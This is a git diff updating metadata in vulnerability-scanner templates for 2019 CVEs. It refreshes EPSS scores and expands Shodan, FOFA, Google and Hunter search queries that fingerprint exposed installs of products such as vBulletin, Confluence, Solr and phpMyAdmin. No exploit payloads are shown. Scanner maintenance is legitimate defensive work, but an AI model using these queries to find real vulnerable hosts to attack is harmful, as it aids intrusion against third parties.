shodan-query: http.html:"sugarcrm inc. all rights reserved" - google-query: intitle:sugarcrm - fofa-query: body="sugarcrm inc. all rights reserved" + shodan-query: + - http.html:"sugarcrm inc. all rights reserved" + - http.title:sugarcrm + fofa-query: + - body="sugarcrm inc. all rights reserved" + - title=sugarcrm + google-query: + - intitle:sugarcrm + - intext:"sugarcrm inc. all rights reserved" tags: cve,cve2019,xss,sugarcrm,edb http: diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index b8c995b875..8c0db63399 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve,cve2019,grafana,dos,intrusive variables: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 1bb0a0cf6b..d5d39fcf09 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: lsoft product: listserv - shodan-query: http.html:"LISTSERV" + shodan-query: + - http.html:"LISTSERV" + - http.html:"listserv" fofa-query: body="listserv" tags: cve2019,cve,xss,listserv,edb,lsoft diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 2dcb929082..5df6421e67 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -29,7 +29,9 @@ info: max-request: 4 vendor: webmin product: webmin - shodan-query: title:"Webmin" + shodan-query: + - title:"Webmin" + - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" tags: cve,cve2019,webmin,rce diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index bbcbbd5be7..6527f72473 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -13,20 +13,22 @@ info: - https://wpscan.com/vulnerability/9267 - https://wordpress.org/plugins/my-calendar/#developers - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41137 + epss-percentile: 0.41606 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: my_calendar_project - product: my_calendar + max-request: 2 + vendor: "my_calendar_project" + product: "my_calendar" framework: wordpress - fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' + fofa-query: "\"wordpress\" && body=\"wp-content/plugins/my-calendar\"" tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 95c326a79d..3483882569 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -27,9 +27,9 @@ info: vendor: greentreelabs product: gallery_photoblocks framework: wordpress - publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/ fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/ + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 74b64243f3..051ce8f6d5 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15859 cwe-id: CWE-200 epss-score: 0.12379 - epss-percentile: 0.94891 + epss-percentile: 0.95414 cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 1e6139120e..edee61075c 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.91254 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpdownloadmanager - product: wordpress_download_manager + product: "wordpress_download_manager" framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 3a947e6bf5..b7f549d5ca 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: dlink product: dns-320_firmware - shodan-query: html:"ShareCenter" + shodan-query: + - html:"ShareCenter" + - http.html:"sharecenter" fofa-query: body="sharecenter" tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 112d15eae1..d4fd45771f 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.69049 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: api_bearer_auth_project - product: api_bearer_auth + max-request: 2 + vendor: "api_bearer_auth_project" + product: "api_bearer_auth" framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index 13a039637e..4773f776e6 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -19,18 +19,22 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16469 cwe-id: CWE-917 - epss-score: 0.17165 - epss-percentile: 0.95967 + epss-score: 0.15463 + epss-percentile: 0.959 cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: experience_manager - shodan-query: http.component:"Adobe Experience Manager" + shodan-query: + - http.component:"Adobe Experience Manager" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: cve,cve2019,aem,eli,csti + tags: cve,cve2019,aem,eli,csti,adobe variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 29eff0c62b..ad6e6b78df 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.67586 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: checklist product: checklist framework: wordpress tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index c433649c88..34d4997cf2 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -20,17 +20,26 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16759 cwe-id: CWE-94 - epss-score: 0.97532 - epss-percentile: 0.99992 + epss-score: 0.97513 + epss-percentile: 0.99985 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vbulletin product: vbulletin - shodan-query: http.component:"vBulletin" - google-query: intext:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.component:"vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve,cve2019,rce,kev,seclists,vbulletin http: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 69ca3778cf..38bae35df0 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -21,16 +21,15 @@ info: cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 - epss-score: 0.53434 - epss-percentile: 0.97316 + epss-score: 0.37504 + epss-percentile: 0.97194 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle - + tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index c04c68ea1d..07629a5020 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -20,15 +20,21 @@ info: cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 - epss-score: 0.3141 - epss-percentile: 0.96581 + epss-score: 0.3552 + epss-percentile: 0.97136 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: icon_hash=892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 89f7376ac7..f8fd6d484d 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -27,9 +27,16 @@ info: max-request: 3 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast http: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 128ff22994..eee644def1 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -30,9 +30,9 @@ info: vendor: code-atlantic product: popup_maker framework: wordpress - publicwww-query: "/wp-content/plugins/popup-maker/" shodan-query: http.html:/wp-content/plugins/popup-maker/ fofa-query: body=/wp-content/plugins/popup-maker/ + publicwww-query: "/wp-content/plugins/popup-maker/" tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 8dfa30b3db..ab9d56a0a1 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: igniterealtime product: openfire - shodan-query: http.title:"openfire admin console" - fofa-query: title="openfire" - google-query: intitle:"openfire" + shodan-query: + - http.title:"openfire admin console" + - http.title:"openfire" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve,cve2019,openfire,lfi,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index abef22e9e1..4bd6b023ff 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: igniterealtime product: openfire - shodan-query: http.title:"openfire admin console" - fofa-query: title="openfire" - google-query: intitle:"openfire" + shodan-query: + - http.title:"openfire admin console" + - http.title:"openfire" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve,cve2019,ssrf,openfire,oast,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index fd5a84290e..d731ab0b7b 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18922 cwe-id: CWE-22 - epss-score: 0.2399 - epss-percentile: 0.96487 + epss-score: 0.14866 + epss-percentile: 0.95795 cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 78059e4bdb..1a608fb539 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -19,16 +19,16 @@ info: cvss-score: 5.3 cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 - epss-score: 0.07254 - epss-percentile: 0.93384 + epss-score: 0.06856 + epss-percentile: 0.93891 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cisco product: rv110w_firmware - fofa-query: icon_hash="-646322113" shodan-query: http.favicon.hash:"-646322113" + fofa-query: icon_hash="-646322113" tags: cve,cve2019,cisco,router,iot http: diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 6c535dbfef..50c8b7f132 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.58236 + epss-percentile: 0.58276 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 66ae291223..74f2612a12 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-1943 cwe-id: CWE-601 - epss-score: 0.03526 - epss-percentile: 0.90666 + epss-score: 0.05334 + epss-percentile: 0.93073 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 530bd00d0f..7c3e954721 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-20183 cwe-id: CWE-434 - epss-score: 0.02447 - epss-percentile: 0.89763 + epss-score: 0.03815 + epss-percentile: 0.91874 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 6e29270446..474ed704f2 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -19,15 +19,18 @@ info: cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 - epss-score: 0.04913 - epss-percentile: 0.92609 + epss-score: 0.04237 + epss-percentile: 0.92253 cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: influxdata product: influxdb - shodan-query: InfluxDB + shodan-query: + - InfluxDB + - http.title:"influxdb - admin interface" + - influxdb fofa-query: title="influxdb - admin interface" google-query: intitle:"influxdb - admin interface" tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index e39c7215bc..fb8dd8f32b 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2767 epss-score: 0.14972 - epss-percentile: 0.95676 + epss-percentile: 0.95807 cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index 82e7bacddb..ee304d0792 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: atlassian product: confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" + - http.component:"atlassian confluence" tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm http: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 474163baa2..80149deac7 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -21,14 +21,16 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97145 - epss-percentile: 0.99783 + epss-score: 0.97045 + epss-percentile: 0.99757 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: atlassian product: confluence - shodan-query: http.component:"atlassian confluence" + shodan-query: + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index ef32e75c7c..35aabc1efa 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -23,7 +23,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,jira,atlassian,exposure http: diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index dcd33c1502..3001a2760c 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -29,7 +29,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,xss http: diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index d344db99a1..b551f6d9c6 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,enumeration http: diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 3dc28e9443..442c28b963 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: labkey product: labkey_server - shodan-query: 'Server: Labkey' + shodan-query: + - 'Server: Labkey' + - 'http.title:"sign in: /home"' + - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' tags: cve,cve2019,xss,labkey,tenable diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 6e948b58a5..6c770339e0 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: labkey product: labkey_server - shodan-query: 'Server: Labkey' + shodan-query: + - 'Server: Labkey' + - 'http.title:"sign in: /home"' + - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' tags: cve2019,cve,tenable,redirect,labkey diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index fab810610f..5fc44e83a9 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-5418 cwe-id: CWE-22,NVD-CWE-noinfo - epss-score: 0.97434 - epss-percentile: 0.99939 + epss-score: 0.97426 + epss-percentile: 0.99937 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index 07618f185d..7eaa95e1aa 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -29,8 +29,12 @@ info: max-request: 2 vendor: revive-sas product: revive_adserver - shodan-query: http.favicon.hash:106844876 - fofa-query: icon_hash=106844876 + shodan-query: + - http.favicon.hash:106844876 + - http.title:"revive adserver" + fofa-query: + - icon_hash=106844876 + - title="revive adserver" google-query: intitle:"revive adserver" tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index a7cc02aafa..c03e7acff8 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve,cve2019,drupal,rce,kev http: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index bac3031a9f..2cde997c55 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -29,10 +29,18 @@ info: max-request: 6 vendor: phpmyadmin product: phpmyadmin - shodan-query: title:"phpmyadmin" - fofa-query: body="pma_servername" && body="4.8.4" - hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + shodan-query: + - title:"phpmyadmin" + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - body="pma_servername" && body="4.8.4" + - title="phpmyadmin" google-query: intitle:"phpmyadmin" + hunter-query: + - app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + - app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 3af501e32f..851e466b54 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: python product: pypiserver - shodan-query: html:"pypiserver" + shodan-query: + - html:"pypiserver" + - http.html:"pypiserver" fofa-query: body="pypiserver" tags: cve,cve2019,crlf,pypiserver,python diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index bb8ecfc9e5..eb62ccb3f3 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -26,7 +26,10 @@ info: vendor: magento product: magento framework: magento - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - cpe:"cpe:2.3:a:magento:magento" + - http.component:"magento" tags: cve,cve2019,sqli,magento http: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 2902504a75..7e0f7fd2c7 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -22,16 +22,24 @@ info: cve-id: CVE-2019-7192 cwe-id: CWE-863 epss-score: 0.96341 - epss-percentile: 0.99518 + epss-percentile: 0.99549 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: qnap product: photo_station - shodan-query: 'Content-Length: 580 "http server 1.0"' - fofa-query: title="photo station" - google-query: intitle:"qnap" + shodan-query: + - 'Content-Length: 580 "http server 1.0"' + - http.title:"photo station" + - http.title:"qnap" + - 'content-length: 580 "http server 1.0"' + fofa-query: + - title="photo station" + - title="qnap" + google-query: + - intitle:"qnap" + - intitle:"photo station" tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss http: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 3d394e5c25..c6b2718dd7 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7254 cwe-id: CWE-22 - epss-score: 0.85367 - epss-percentile: 0.98459 + epss-score: 0.85153 + epss-percentile: 0.9853 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 0acc08a350..788905205a 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: nortekcontrol product: linear_emerge_essential_firmware - shodan-query: http.title:"eMerge" + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 209a9925ea..2ea022182b 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: nortekcontrol product: linear_emerge_essential_firmware - shodan-query: title:"eMerge" + shodan-query: + - title:"eMerge" + - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 2a7931a208..77d1fcb755 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 - epss-score: 0.91724 - epss-percentile: 0.98849 + epss-score: 0.93107 + epss-percentile: 0.99046 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 0b06e29b23..7e3a8e2670 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.13896 - epss-percentile: 0.95514 + epss-percentile: 0.95652 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 @@ -30,6 +30,9 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" tags: cve,cve2019,aem,adobe diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 9bcc15b9df..d86d89e9ef 100644 --- 